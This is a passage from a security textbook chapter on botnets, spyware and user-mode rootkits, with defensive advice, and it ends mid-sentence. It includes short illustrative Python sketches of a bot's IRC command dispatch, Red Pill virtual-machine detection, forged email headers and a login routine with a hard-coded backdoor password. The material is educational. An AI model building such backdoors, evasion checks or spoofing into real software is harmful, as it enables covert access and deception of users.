From a functionality perspective, most bots include numerous actions that the bot can take when it receives commands from the attacker across the network. The phatbot family includes more than 100 different functions, each in a modular block of code the attacker can choose to embed in the bot or leave out if the given function is not desired. Variations of phatbot include all of the functionality we analyzed for remote-control backdoors, including all of the features of Table 10.3, such as a remote command shell, remote registry alterations, and streaming video and audio of a victim machine. However, bot functionality has evolved even further than the Table 10.3 backdoor capabilities, including special features that take advantage of a large number of infected systems in a bot-net. Table 10.4 includes some bot-specific features.

Table 10.4 A Sampling of Bot Functionality

Image

Most bot-nets, including variations of phatbot, sdbot, and mIRC bots, are controlled via IRC, a protocol that gives the attackers numerous advantages. First, many networks, especially those ripe with poorly secured systems like home user machines and university student systems, allow outbound IRC communication. But even more important, IRC offers the attackers a built-in one-to-many communications path, in effect implementing a multicast channel. Think about it. If an attacker wants to send a single command to 171,000 bot-infected machines, the bad guy could write code that creates this message once and then sends it to each of the 171,000 machines, one at a time. That's a time-consuming process, even for software on a relatively fast machine. IRC is a much more efficient bot communication channel. The various bots in the bot-net are all configured to log into a single IRC channel. The attacker then logs into this channel and sends commands across the channel to all of the bots, which then execute the commands. The attacker doesn't even need to use a specialized client to control the bots. Instead, the bad guy can log into the channel using any IRC client, and type special bot-control commands into the channel to make the bots do his or her bidding. There's no need to replicate the message 171,000 times, because IRC does that automatically. This use of IRC also lets the bots poll the attacker for commands, initiating an outbound connection from the bot-infected system to an IRC server. If the victim machine's personal firewall blocks inbound connections, that's okay for the attacker, whose commands are riding into the victim on an outbound IRC session. By default, IRC servers listen on TCP port 6667. Most bots today still use this default IRC port, although attackers are increasingly using the same IRC protocol, but configuring their IRC servers to listen on a different TCP port. That way, their actions are a bit stealthier, without the telltale TCP port 6667 instantly tipping off investigators.
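To make the mechanics concrete, here is a toy sketch (in Python) of the kind of parsing a bot performs on traffic arriving over its control channel. The nickname, channel, and the ".scan" command are all hypothetical, and this is deliberately just the harmless parsing-and-dispatch skeleton, not a working bot:

```python
# Toy illustration of a bot's command loop: parse an IRC PRIVMSG line from
# the control channel and dispatch on its leading token.

def parse_irc_line(line):
    """Split ':nick!user@host PRIVMSG #chan :message' into its pieces;
    return None for anything that isn't channel chatter."""
    if " PRIVMSG " not in line:
        return None
    prefix, rest = line.split(" PRIVMSG ", 1)
    sender = prefix.lstrip(":").split("!", 1)[0]
    channel, message = rest.split(" :", 1)
    return sender, channel, message

def dispatch(message, handlers):
    """Invoke the handler registered for the message's first token, if any."""
    parts = message.split()
    handler = handlers.get(parts[0]) if parts else None
    return handler(parts[1:]) if handler else None

# Hypothetical command table; a real bot would have dozens of entries
handlers = {".scan": lambda args: "would scan " + args[0]}

parsed = parse_irc_line(":herder!u@h PRIVMSG #botchan :.scan 10.0.0.0/8")
if parsed:
    sender, channel, message = parsed
    print(sender, channel, dispatch(message, handlers))
```

Note that every bot logged into #botchan receives that single PRIVMSG; the IRC server does the 171,000-fold replication for free, which is exactly why the protocol appeals to bot-herders.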

Although most bots use IRC today, a small number of them are employing other even more powerful protocols for communication with the attacker. IRC has numerous benefits for the bad guys, but it has one significant problem: its reliance on one or a small number of IRC servers to carry the message to all of the bots. If an investigator shuts down the IRC server or removes the particular channel used by the bot-net, the attacker is out of business with a headless bot-net the attacker cannot control. To alleviate this problem, some variations of phatbot employ another very pernicious method of communication, a peer-to-peer protocol called Waste. Originally created by America Online for file sharing among users, Waste is a highly distributed communication mechanism, without a centralized server to coordinate communications. Using the Waste protocol, various bot-infected machines automatically discover each other by scanning for a certain attacker-chosen TCP port. Once they discover each other, each bot keeps the other bots up to date regarding commands received from the attacker by shipping the commands across the network to all other bot-infected systems that were discovered. So, suppose an attacker has a bot-net of 171,000 systems, controlled via Waste. The attacker can inject commands into any one or more of these machines, which will dutifully relay that command to other systems on the bot-net, which will carry the command further to other systems in the bot-net, and so on and so forth until all of the massed hordes receive the attacker's information. Now, suppose an investigator discovers some systems on the bot-net and shuts them down. Let's assume that we've got an amazing investigator who is able to prune 30,000 bots off of this bot-net, removing the bot software from each of those machines. Is the attacker out of business now? Hardly! Using Waste, the remaining systems will continue to communicate the attacker's wishes. With Waste, the bad guys have a much more resilient protocol than IRC. Expect to see much more of this kind of bot communication in the future.

One additional bot feature included in some variants of the phatbot family is worth noting: the ability to detect a virtual machine environment. Some bot authors recognized that the good guys are researching the latest bots by running them in a virtual machine environment, such as VMware or VirtualPC, to perform dynamic analysis of the bot’s behavior. These virtual machine tools let a user run one or more guest operating systems on top of a host operating system. With these tools, you could run three or four Windows machines on a single Linux box, or vice versa. Whenever I’m looking at the latest bot myself to see how it functions, I instinctively run the tool in VMware. If the bot under analysis hoses up my virtual machine, VMware lets me revert to the last good virtual machine image, quickly and easily removing all traces and damages of the bot without having to reinstall my operating system.

Yet, because so many researchers rely on virtual machine environments to analyze malicious code such as bots, the bad guys are trying to foil our analysis. Some phatbot specimens check to see if they are running in a virtual machine. If so, they shut off some of their more dastardly functionality so that researchers cannot observe it. This capability reminds me of some of the actions of my own children. My son sometimes gets into fights with my daughter while I’m in the other room. I hear a huge commotion and the upset shouts of my daughter, a sure sign that the boy has done something wrong. Yet, when I walk into the room to scope out the situation, my son almost always smiles at me with a look of pure innocence on his face, as if to say, “I’ve done nothing wrong, Daddy. Please move on.” Malicious code, in the form of virtual-machine-detecting bots, sometimes operates in the same manner when a researcher is investigating its capabilities.

Most of today’s bots detect virtual machines in a very lame fashion by looking for virtual machine environment artifacts in the file system, Registry, and running processes of the machine. If the bot finds any of the files, Registry keys, or processes associated with VMware or VirtualPC, it alters its functionality. However, these types of artifacts are typically created in the host operating system, and are often left out of the guest operating system itself, where the researcher typically executes the bot. Thus, most of today’s virtual-environment-detecting capabilities can be trivially fooled. But that won’t always be the case.

A brilliant researcher named Joanna Rutkowska has introduced a tool at www.invisiblethings.org that detects a virtual machine environment in a much more subtle and fundamental way. Her tool is called the Red Pill, in homage to the Matrix movie where Keanu Reeves’ character Neo takes a Red Pill to leave the Matrix and enter the real world. The Red Pill program runs a single machine-language instruction for x86 processors, called SIDT. This instruction stores the contents of the Interrupt Descriptor Table Register (IDTR) in a given memory location.

You see, the IDTR points to a table in memory that tells the operating system where it should go to get code to handle various types of interrupts. Under normal circumstances, this interrupt table (pointed to by the IDTR) is typically located very near the start of system memory. Yet, when two machines are running on a single piece of hardware (which they are in the case of a host and guest operating system of a virtual machine environment), they cannot use the same IDTR, because that would make them pretty much the same operating system. Therefore, virtual machines typically have their own interrupt table located at a higher memory location than a real system’s interrupt table.

The Red Pill simply looks at the IDTR (via the SIDT instruction). If it is a small number (less than 0xd0), the Red Pill prints out a message saying that we are running on a real operating system. If it is greater than this value, the Red Pill says we’re on a virtual machine. It works amazingly well on both Linux and Windows, with both VMware and VirtualPC, and is extremely hard to dodge. I expect to see the technique used in future iterations of bots very soon.
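The actual Red Pill is just a few bytes of x86 machine code wrapping the SIDT instruction; the decision it makes afterward can be sketched in a few lines (assuming the 0xd0 threshold described above, applied to the most significant byte of a 32-bit IDT base; the sample addresses below are illustrative, not measured values):

```python
# The classification step of the Red Pill technique, separated from the
# machine-code SIDT read that actually retrieves the IDT base address.

def redpill_verdict(idt_base):
    """Apply Red Pill's test to a 32-bit IDT base address: a most
    significant byte above 0xd0 suggests a relocated, virtual-machine
    interrupt table; a low base suggests real hardware."""
    msb = (idt_base >> 24) & 0xFF
    return "virtual machine" if msb > 0xD0 else "real hardware"

# Illustrative values: a low IDT base typical of a real 32-bit system
# versus a high base like those reported inside virtual machine guests
print(redpill_verdict(0x8003F400))   # real hardware
print(redpill_verdict(0xFFC18000))   # virtual machine
```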

Distributing Bots: The Worm-Bot Feedback Loop

We’ve analyzed bot functionality and bot communications, but how do these bots get installed on a victim machine in the first place? Attackers sometimes rely on the same vectors for bot propagation they’ve historically used to deploy remote-control backdoors, namely, installing bots themselves or tricking users into installing them. Although such techniques certainly work, they can be difficult avenues by which to achieve a truly enormous bot-net. To improve their chances of conquering hundreds of thousands of victims with a bot, attackers have turned to worms.

Worms are self-replicating code that propagates across a network in an automated fashion. A worm conquers one machine using a given exploit, such as a buffer overflow vulnerability. Then, once lodged into that victim system, the worm uses it to scan for and compromise other machines. This new set of victims is likewise used to scan for and take over even more systems, resulting in an exponential rise in the number of systems with the worm installed.

Historically, worms focused on spreading copies of themselves. Worms begat worms, which begat more worms. But today, attackers are using worms and bots together. Suppose an attacker has compromised only ten measly machines with a bot. That bad guy could write a worm to infect new machines, and use those ten bot-infected boxes as a nice running start for worm distribution. Let’s suppose that those ten bots spread the worm to 100 systems each, resulting in 1,000 newly compromised machines. The attacker can include that very same bot as a payload in the worm. When the worm takes over a new victim, it carries the bot (and with it, the attacker’s control) to that new system. Now, the bad guy is up more than 1,000 bot-infected systems, a 100-fold increase in the bot-net size. The attacker can then craft a new worm that exploits another flaw, using the more than 1,000 bot-infected machines to compromise, let’s say, another 100,000 machines, installing a bot on them as well. So, we’ve entered a vicious feedback loop, as illustrated in Figure 10.6. Bots are spreading worms, which are spreading bots, which are spreading even more worms. No wonder the bad guys are establishing vast bot-nets around the world!
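The arithmetic of that feedback loop is easy to check; the spread factor of 100 victims per bot is the example figure used above:

```python
# Two generations of the worm-bot feedback loop, using the example figures:
# each bot seeds the worm on 100 new machines, and every victim gets the
# bot installed in turn, joining the next generation of spreaders.
bots = 10

new_victims = bots * 100    # ten bots launch the first worm
bots += new_victims
print(bots)                 # 1010 -- the "more than 1,000" systems

new_victims = bots * 100    # the enlarged bot-net launches the next worm
bots += new_victims
print(bots)                 # 102010 -- roughly the "another 100,000" figure
```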

Figure 10.6 Bots spread worms, which spread bots, which spread worms, which...

Image

One of the most popular forms of bot-worm combos is a mass-mailing worm that carries a bot. The attacker sends e-mail spam with an attachment claiming to be an important document or a critical system patch the user must install.

Some unsuspecting users run the attachment, which installs a worm–bot combo on their machines. The bot gives the attacker control. The worm component then harvests e-mail addresses from the users’ e-mail program, and forwards the same message to a new set of victims. Interestingly, many of these worms spoof the source address of the e-mail. So, suppose Victim A gets infected and has e-mail messages from Victim B and Victim C in his e-mail client. The nasty worm then sends an e-mail from Victim A’s machine, with a source e-mail address of Victim B and a destination address of Victim C. Victim C will not even realize that Victim A is infected, and might trust the e-mail appearing to come from Victim B. With thousands of e-mail addresses harvested from Victim A, this tactic can spread the worm and bot to a large number of new victims, where the cycle repeats itself. We’ve seen such tactics applied to many worms that carry bots, including variations of the widespread Sobig, Bagle, Netsky, and MyDoom malicious code. Such techniques are likewise applied in phishing attacks.
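The spoofing itself requires no special trickery, because plain SMTP never authenticates the From header. A minimal sketch (with made-up addresses) shows how easily a message can claim to come from Victim B:

```python
# How a mass-mailing worm forges headers using addresses harvested from
# Victim A's mailbox. All addresses here are made up for illustration.
from email.message import EmailMessage

harvested = ["victim.b@example.com", "victim.c@example.com"]

msg = EmailMessage()
msg["From"] = harvested[0]              # spoofed: Victim B never sent this
msg["To"] = harvested[1]                # Victim C may trust "Victim B"
msg["Subject"] = "Important document"
msg.set_content("Please see the attached file.")

# Nothing in these headers identifies the real origin, Victim A's machine.
print(str(msg["From"]), "->", str(msg["To"]))
```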

Additional Nastiness: Spyware Everywhere!

In addition to remote-control backdoors and bots, another frustratingly common form of application-level Trojan horse backdoor is spyware. The Internet today is a cesspool of spyware, with the threat growing all the time as unscrupulous advertisers and scam artists aggressively foist their spyware on huge numbers of users around the world. Some innocent Web surfers are often shocked to discover dozens or even hundreds of spyware specimens installed on their systems. Spyware, as its name implies, spies on users to watch their activities on their machine on behalf of the spyware’s author or controller. This spying ranges from fairly innocuous activities to major invasions of users’ privacy, possibly even leading to identity theft. Some of the most popular spyware capabilities are summarized in Table 10.5. It is important to note a distinction between spyware and the backdoors and bots we’ve been analyzing. The remote-control backdoors of Table 10.3 and the bots of Table 10.4 typically include huge amalgamations of different functional doo-dads, bundling together many different rows from those tables into a single package. Individual spyware specimens, however, tend to be pretty focused, with each spyware package typically offering only one or two functions listed in Table 10.5. Some would consider this a major limitation, but, as someone who values privacy, I’m happy we haven’t seen all of these capabilities bundled together in a single package ... yet!

Table 10.5 A Sampling of Spyware Functionality

Image

So this spyware is capable of some pretty invasive stuff, but how does it get installed on a victim machine in the first place? In some instances, spyware rides along inside a bot, installed by an attacker or a worm. However, by far the most common method of spyware propagation is users themselves, who are tricked into installing spyware that is bundled with other programs. Some of the add-on search bars for popular browsers include spyware that aggregates user surfing habits or even tailors search results based on advertisers’ wishes. Some computer games available for free or even on a commercial basis include spyware capabilities. A few other unique system add-ons, such as those annoying little animated mouse cursors, special screen backgrounds, and screen savers carry an undocumented extra spyware bonus packaged with their main functionality. A few pornographic Web sites require users to install special video player software or other tools to optimize those sites’ images on users’ machines. Such tools quite often include specialized spyware devoted to the porn industry.

Sometimes, spyware itself is disguised as an antispyware program, designed to trick users into installing it on their systems, thinking that they’ve gotten some level of protection. In particular, the wonderful Ad-Aware program by Lavasoft is a really good antispyware program, detecting many forms of spyware on a machine. Ad-Aware is available for free as a tool that you run on demand, or on a commercial basis with extra features like real-time spyware installation detection. I use Ad-Aware on my own machine on a regular basis and have been very pleased with its results in fighting nasty spyware. However, there are some evil imposters out there, with tools sometimes named A-daware and even Ada-ware that pretend to be the normal, wholesome Ad-Aware. Sadly, the imposters actually install spyware on users’ machines. Because of this concern, make sure you use Ad-Aware downloaded only from www.lavasoft.com and those mirrors that the main site directly links to. Otherwise, you never know what you’re going to get!

So many programs available for free download on the Internet today include spyware because the companies behind the spyware have made it economically beneficial for these programs’ authors to bundle in a little bit of spyware. I recently received a message from a software developer who had written a rather popular computer game, downloaded by 200,000 people over the last year. The game is available for free, and the author created it as a labor of love and to have some fun. This game author had received e-mail from a spyware purveyor containing a pretty lucrative offer. By adding a couple of small additional programs to his game installation package, this developer would reap significant financial rewards. For each installation of a tool that aggregates user surfing habits, the developer would receive a nickel. With every install of a search bar that would filter and inject ads into a user’s browser, the developer would get a dime. For a pop-up ad generator, the developer got a quarter. And there were several other options offered on this spyware purveyor’s menu. With the whole menu in view, the developer realized that by bundling all of these spyware options into his game program, he could make approximately 95 cents for each installation. With over 200,000 people installing his game every year, the developer could make some serious cash on the side, almost $200,000 per year in extra income! Happily, the game author that e-mailed me was horrified at even receiving the offer, and never included these functions in the game. Sadly, however, not all software developers are so scrupulous. Many of them succumb to these scary offers, lacing their programs with an unadvertised spyware bonus. In effect, their programs actually become Trojan horse backdoors. They tease users with one useful or benign function, while surreptitiously installing another function that gives the attacker some level of access to or control over the victim machine and user.

Besides bundling with other programs, spyware (and other forms of malicious code) is increasingly propagating via Web browser vulnerabilities. As we discussed in Chapter 7, attackers have exploited otherwise-innocent Web sites and placed malicious code designed to infect machines that browse these now-toxic sites. By simply surfing to the wrong site with a vulnerable browser, a victim machine becomes infected with spyware.

Defenses Against Application-Level Trojan Horse Backdoors, Bots, and Spyware

Bare Minimum: Use Antivirus and Antispyware Tools

The vast majority of the remote-control backdoors and bots described in this chapter have a well-known way of altering the system, adding particular Registry keys, creating specific files, and starting certain services. Antivirus programs include signatures to detect these artifacts created by each tool on a hard drive and in system memory. Although remote-control backdoors and bots are not computer viruses (because they do not automatically infect other applications or documents), they can be detected by antivirus tools. All of the major antivirus program vendors have released versions of their software that can detect and remove the most popular evil backdoors and bots. It’s important to note, however, that most antivirus tools do not have signatures for Netcat and VNC, two programs sometimes used legitimately, but often abused by attackers as remote-control backdoors.

Beyond the backdoors and bots, which can be controlled by antivirus tools, we also need to deploy antispyware tools diligently. These tools include signatures to look for the most common forms of spyware on the Internet. Some antivirus tools even include antispyware capabilities. Unfortunately, the antispyware capabilities of some of the antivirus tools are watered down, due to economic and legal factors. From an economic perspective, some antivirus vendors limit the comprehensiveness of the signature base of their bundled antispyware capabilities to help encourage customers to buy a separate add-on antispyware tool. Rather than selling one program to a user, the vendor can now sell two.

From a legal perspective, some spyware purveyors have sued antivirus companies, claiming that their so-called spyware programs aren’t, in fact, malicious. They point out that their programs are merely helping to customize the user’s Web experience based on that user’s particular needs and habits. Underscoring their position, these spyware people point out that their licensing agreements specifically tell users how their information will be gathered and used, and that users must agree to these actions before the program is installed. Of course, this licensing agreement is typically several pages long, written in indecipherable legalese, and flashed quickly on the user’s screen in small text with a big OK button that many users reflexively click. Thus, argue these spyware vendors, they’ve gotten the user’s permission, and therefore their tools aren’t evil. One person’s spyware is another person’s meal ticket, I suppose. When an antivirus company labels spyware as malicious, that costs the spyware authors money, so they sometimes respond with lawsuits. Many antispyware programs get around this legal imbroglio by not calling discovered spyware specimens “malicious code.” Instead, any discovered spyware is labeled Potentially Unwanted Programs (PUPs). It’s up to the user to evaluate whether a given PUP should be there or should be deleted, so the antispyware vendor has thus dodged some significant legal problems.

To deal with these issues, I prefer to run both an antivirus tool and a separate antispyware tool on each of my machines to get two layers of protection, one against each type of threat. That way, I don’t have to worry about watered-down antispyware capabilities impacted by economic or legal wrangling. I can also carefully manage my PUPs based on my own needs. And, best of all, some of the antispyware tools label Netcat and VNC as a PUP, letting me make the decision of whether it’s my own version of these tools installed for administration, or some evildoer’s version that I want to eradicate.

Because attackers are constantly developing new remote-control backdoors, bots, and spyware, it is critical for organizations to load the latest antivirus and antispyware definitions into antivirus and antispyware software. These virus definition files should be updated daily or as new signatures are released. The antivirus and antispyware vendors have all developed capabilities to download virus definitions across the Internet, and have included automatic installation of the latest checks. By taking time to implement an effective antivirus and antispyware program, users and organizations can minimize the threat posed by application-level Trojan horses and greatly improve the security of their critical information resources.

Looking for Unusual TCP and UDP Ports

Many of the remote-control backdoors and bots we’ve discussed listen on a given TCP or UDP port. These ports can be discovered using a variety of mechanisms that we discussed in Chapter 6, Phase 2: Scanning. Remember, the built-in Windows netstat command, as well as third-party tools like TCPView, Fport, and ActivePorts, can help you find strange listening ports on a Windows machine. On Linux and UNIX, the netstat command comes in handy as well, along with the lsof -i command.
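Once you have the list of listening ports from netstat, TCPView, or lsof -i, the real work is comparing it against what should be there. A simple sketch of that comparison (the baseline and observed ports below are examples, not recommendations):

```python
# Compare observed listening ports against a known-good baseline. In real
# life the observed list comes from netstat, TCPView, or lsof -i; here it
# is supplied directly so the comparison logic stands alone.

def unexpected_ports(listening, baseline):
    """Return listening ports that are absent from the approved baseline."""
    return sorted(set(listening) - set(baseline))

baseline = {22, 80, 443}                   # what this machine should expose
observed = [22, 80, 443, 6667, 31337]      # what a port scan actually found

print(unexpected_ports(observed, baseline))   # ports that merit a close look
```

In this example, the unexpected TCP ports 6667 and 31337 would jump out: the former is the default IRC port favored by bots, the latter a port long associated with backdoor listeners.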

Knowing Your Software

Although antivirus and antispyware tools provide a good deal of protection, in the end, you have to be wary of what you run on your systems. Understand who wrote your software and what it is supposed to do. When you troll the Internet and find some apparently new, useful tool, be very careful with it! Can you trust it? Antivirus and antispyware tools can help here by checking to see if the executable has any detectable signatures of malicious software. However, antivirus and antispyware tools are not a panacea. They only know certain characteristics of malicious software, and cannot predict the maliciousness of all programs.

Therefore, beyond virus and spyware checking, you should consider the developer of the program you are downloading. Is the developer trustworthy? Do you really want to run a program you downloaded from www.thisevilprogramwillannihilateyourcomputer.com, even if your antivirus and antispyware scanners give it an apparent clean bill of health? To avoid problems with application-level Trojan horse backdoor tools, only run software from trusted developers. Of course, many of the tools discussed in this book come from developers you might not trust. That is why you should use them with such care, on nonproduction systems for evaluation purposes.

So, who is a trusted developer, and how do you make sure software came from a trusted source? The software development community has developed a variety of techniques to determine the trustworthiness of software. Many software programs distributed on the Internet include a digital fingerprint so a user can verify that the program has not been altered. Other developers go further and include a digital signature to identify the developer of the program and verify its integrity. By recalculating the fingerprint or verifying the signature of a downloaded program, a user can be more certain that the program was written by the developer and was not altered by an attacker.

Digital fingerprints are typically implemented using a hash algorithm. The Message Digest 5 (MD5) algorithm and the Secure Hash Algorithm 1 (SHA-1) are common routines used by software developers to create a digital fingerprint. By running a program such as md5sum or sha1sum, which are distributed with many Linux operating systems, the developer creates a digital fingerprint. This fingerprint is stored in a safe place, such as the developer’s own Web site or a high-profile public Web site. After downloading a program from the developer, users can calculate the fingerprint of the program on their own system using md5sum or sha1sum on Linux. Alternatively, you could rely on the md5deep and sha1deep programs for Linux, UNIX, and Windows, written by Jesse Kornblum and distributed for free. The public fingerprint can be compared with the just-calculated fingerprint of the downloaded program to verify the program hasn’t been altered. In this way, fingerprints give users assurance of the integrity of a program. Figure 10.7 shows an MD5 fingerprint at the very useful www.rpmfind.net Web site for the sniffer program, tcpdump. Still, you need to be careful. If attackers break into a software distribution site, they might load a Trojan horse backdoor of the software and alter the MD5 sum or SHA-1 hash on the site to match their own malicious code. For this reason, I always download a new program from a couple of different mirrors and compare the hashes between the different sites to minimize the chance of an attacker substituting evil code in place of the program I want to use.

Figure 10.7 MD5 hash of tcpdump helps ensure it hasn’t been Trojanized.

Image
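The fingerprint check described above is easy to script. Here’s a hedged Python sketch (using the standard hashlib module rather than the md5sum or sha1sum binaries, which matters if the on-disk binaries themselves might be Trojaned) that computes a file’s digest and compares it against a published value:

```python
import hashlib

def file_digest(path, algorithm="sha1"):
    """Compute the hex digest of a file, reading it in chunks."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def matches_published(path, published_hex, algorithm="sha1"):
    """Compare a downloaded file against a publisher's posted fingerprint."""
    return file_digest(path, algorithm) == published_hex.strip().lower()
```

Following the advice above, you’d run this against the same file downloaded from a couple of different mirrors and compare the results, rather than trusting any single site’s posted hash.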

Going further, other programs carry a digital signature created by the program’s developer. These digital signatures provide integrity assurances and authentication of the tool’s developer. For example, a developer could use the PGP or Gnu Privacy Guard (GnuPG) programs to digitally sign the code. Alternatively, Microsoft has created its Authenticode initiative for digitally signing software developed for Microsoft platforms. By using a PGP- or GnuPG-compatible program or Internet Explorer’s built-in Authenticode signature capabilities, a user can check the signature of a program to verify that the program came from a given developer and hasn’t been altered.

So with these technologies, you can verify that a program was not altered and that it was written by a given developer. That still leaves open the issue of whether you can trust that developer. Who can you trust, after all? Can you trust the software from a major software company? Perhaps. Can you trust the software from a small developer on the Internet you’ve never heard of until you stumbled on their latest cool game? That is purely a policy issue, and a decision you have to make for yourself and your organization.

User Education Is Also Critical

To prevent application-level Trojan horse backdoor attacks, you must configure your browsers conservatively so they don’t automatically run ActiveX controls downloaded from the network. All of your Web users should be educated to avoid alteration of the security settings of their browsers. In particular, the browser should be configured to execute only signed ActiveX controls from trusted software houses. Better yet, just disable all ActiveX—now there’s an idea! Of course, if you turn off all ActiveX, some applications on the Internet might not work. Figure 10.8 shows the security settings of Internet Explorer that cover downloading and running ActiveX controls, located in your browser under Tools → Internet Options → Security → Custom Level. If users alter these settings, they could cause major trouble, allowing malicious software to seep in from the Web to be executed on a protected network.

Figure 10.8 Internet Explorer’s ActiveX control settings.

Image

Because of these concerns, you might want to block ActiveX controls without proper digital signatures from trusted sources at your firewalls to prevent them from coming into your network. Several firewall vendors have the ability to drop all improperly signed ActiveX controls. By blocking bad ActiveX controls at the perimeter of your network, you won’t have to worry about these beasts getting through your barriers.

Finally, educate your user base about phishing attacks, and make sure they don’t respond to unsolicited e-mail that appears to come from e-commerce sites or banks. Whenever they surf to a Web site that requests sensitive information, users should check to make sure that any certificates associated the site appear to come from a legitimate site and a legitimate Certificate Authority. If you find some nefarious phishing e-mail, report it to the Anti-Phishing Working Group, at www.antiphishing.org, a great team that works to stomp out phishing by shutting down phishers’ Web sites and improving user awareness.

Even Nastier: User-Mode Rootkits

The application-level Trojan horse backdoors we’ve discussed so far (Netcat listeners, remote-control backdoors, bots, and spyware) are separate applications that an attacker adds to a system to act as a backdoor. Although these application-level Trojan horse backdoors are very powerful, they are often detectable because they are separate application-level programs running on a machine. Going back to our soup analogy from Table 10.2, you could use a poison detector to determine if someone has added poison to your soup. Similarly, by detecting the additional software running on a machine (using antivirus and antispyware programs, for example), a system administrator can investigate and detect the application-level Trojan horse backdoor.

User-mode rootkits are a more insidious form of Trojan horse backdoor than their application-level counterparts. User-mode rootkits raise the ante by altering or replacing existing operating system software, as shown in Figure 10.9. Rather than running as a foreign application (such as Netcat or a bot), user-mode rootkits modify critical operating system executables or libraries to let an attacker have backdoor access and hide on the system. They are called user-mode rootkits because these tools alter the programs and libraries that users and administrators can invoke on a system, as opposed to the kernel-mode rootkits that change the heart of the operating system, the kernel, which we discuss later in this chapter. Back to our analogy, rather than adding poison to the soup, user-mode rootkits genetically alter your existing potatoes so that they become poisonous, making detection even more difficult. There is no foreign additive to the soup; instead, parts of the soup itself have been altered with malicious alternatives. By replacing or tweaking operating system components, rootkits can be far more powerful than application-level Trojan horse backdoors.

Figure 10.9 Comparing application-level Trojan horse backdoors with user-mode rootkits (for Linux and UNIX systems in this example).

Image

User-mode rootkits have been around for well over a decade, with the first very powerful rootkits detected in the early 1990s on UNIX systems. Many of the early rootkits were kept within the underground hacker community and distributed via IRC for a few years. Throughout the 1990s and into the new millennium, user-mode rootkits have become more and more powerful and radically easier to use. Now, user-mode rootkit variants are available that practically install themselves, allowing an attacker to “rootkit” a machine in less than ten seconds.

What Do User-Mode Rootkits Do?

Contrary to what their name implies, rootkits do not allow an attacker to gain root access to a system initially. Rootkits depend on the attackers’ having already obtained super-user access (that is, root on Linux and UNIX machines, or administrator or SYSTEM privileges on Windows machines). In a rootkit attack, this super-user access is likely obtained using the techniques described in Chapters 7 and 8, including buffer overflows, password cracking, session hijacking, and other means. Once an attacker conquers root, administrator, or SYSTEM privileges on a machine, a rootkit is a suite of tools that let the attacker maintain super-user access by implementing a backdoor and hiding evidence of the system compromise. User-mode rootkits are available for a variety of platforms, including Linux, BSD, Solaris, HP-UX, AIX, and other UNIX variations. Several user-mode rootkits have been released for Windows platforms as well. We’ll look at Linux/UNIX and Windows user-mode rootkits separately in this chapter.

Linux/UNIX User-Mode Rootkits

Most Linux and UNIX user-mode rootkits replace critical operating system files with new versions that let an attacker get backdoor access to the machine and hide the attacker’s presence on the box. Each rootkit might alter a half-dozen or more critical executables to achieve these goals. Most Linux/UNIX rootkits include several elements, including backdoors, sniffers, and various hiding tools, each of which we explore next.

Linux/UNIX User-Mode Rootkit Backdoors

Some of the most fundamental components of many user-mode rootkits for Linux and UNIX are a full complement of backdoor executables that replace existing operating system programs on the victim machine with new rootkit versions. But how do these rootkits implement their backdoors? To understand rootkit backdoors, it’s important to know what happens when you log in to a Linux or UNIX machine. When you log in to a system, whether by typing at the local keyboard or accessing the system across a network using telnet, the /bin/login program runs. Alternatively, if you log in using SSH, the ssh daemon runs, typically located in /usr/sbin/sshd. The system uses the login or sshd executables to gather and check the user authentication credentials, such as the user’s ID and password for /bin/login and the user’s public key for specific configurations of sshd. Once the user provides authentication credentials, the login or sshd program checks the system’s password file or the user’s SSH credentials to determine whether the authentication credentials are accurate. If they are okay, we’ve verified the user’s identity, so the login or sshd routine allows the user into the system.

Many user-mode rootkits replace the login and sshd programs with modified versions that include a backdoor password for root access hard-coded into the login and sshd executables themselves. If the attacker enters the backdoor root password, the modified login and sshd programs instantly give root access to the system. Even if the system administrator alters the legitimate root password for the system (or wipes the password file clean), the attacker can still log in as root using the backdoor password embedded in the login and sshd executables. So, a rootkit’s login and sshd routines are really backdoors, because they can be used to bypass normal system security controls. Furthermore, they are Trojan horses, because although they look like normal, happy programs, they are really evil backdoors.
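Conceptually, the Trojaned check works something like the following Python sketch. This is a hypothetical illustration of the logic, not actual rootkit code, and the backdoor password “rewt” is my own made-up example: the backdoor comparison runs first, before the real credentials are ever consulted.

```python
BACKDOOR_PASSWORD = "rewt"  # hypothetical hard-coded value

def trojaned_login(username, password, check_system_credentials):
    """Mimics a rootkitted /bin/login: the backdoor check happens first."""
    if password == BACKDOOR_PASSWORD:
        return "root"      # instant root, ignoring the real password file
    if check_system_credentials(username, password):
        return username    # normal path: defer to the legitimate check
    return None            # authentication failed
```

This is why changing or even wiping the real password file doesn’t help: the backdoor comparison never touches it.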

Figure 10.10 shows a user logging onto a system before and after a user-mode rootkit is installed. In this example, the login routine is replaced with a backdoor version from the widely used Linux RootKit, lrk6. Note the subtle differences in behavior of the original login routine and the new backdoor version.

Figure 10.10 Behavior of a login executable before and after installation of a Linux rootkit.

Image

In Figure 10.10, the first difference we notice in the before and after pictures is the inclusion of the system name before the login prompt on the rootkitted system, which says “bob login:” instead of simply “login:”. Additionally, when we tried to log in as root, the original login routine requested our password. The system is configured to disallow incoming telnet as root, a common configuration on Linux and UNIX systems, so it gathered the password but wouldn’t allow the login. The original login executable just displayed the “login:” prompt again. The rootkitted login program however, displayed a message saying, “root login refused on this terminal.”

Of course, a more sophisticated attacker would first observe the behavior of the login routine, and very carefully select (or even construct) a rootkit login routine to make sure that it properly mimics the behavior of the original login routine. However, if the behavior of your login routine (or sshd executable) ever changes, as shown in Figure 10.10, this could be a tip-off that something is awry with your system. You should investigate immediately. The difference could be due to a patch or system configuration change, or it could be a sign of something sinister.

To detect backdoors like this, system administrators sometimes run various executables like the login and sshd programs through the strings command, a Linux/UNIX program that shows sequences of consecutive ASCII characters in a file. If an unfamiliar sequence of characters is found, it might be a backdoor password. After all, a login or sshd executable could have the backdoor password in it, which it uses to compare to see if the attacker is trying to get in. A mysterious appearance of a new, unexpected string in an executable could indicate a backdoor password.

The majority of rootkit developers know of this strings technique and developed a clever means for foiling it. In most of today’s rootkits, the backdoor password is split up and distributed throughout the backdoor executable program file, and is not a sequence of consecutive characters in the file. The password is only assembled in real time when the login or sshd routine is executed to check if the backdoor password has been entered. Therefore, the strings routine will not find the password in the executable, because it is not a sequence of characters.
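Both the strings technique and its countermeasure are easy to demonstrate. Here’s a small Python sketch of my own that mimics the strings command’s search for runs of printable ASCII, showing why a password split across the file escapes detection:

```python
import re

def strings(data, min_len=4):
    """Rough equivalent of the UNIX strings command: find runs of
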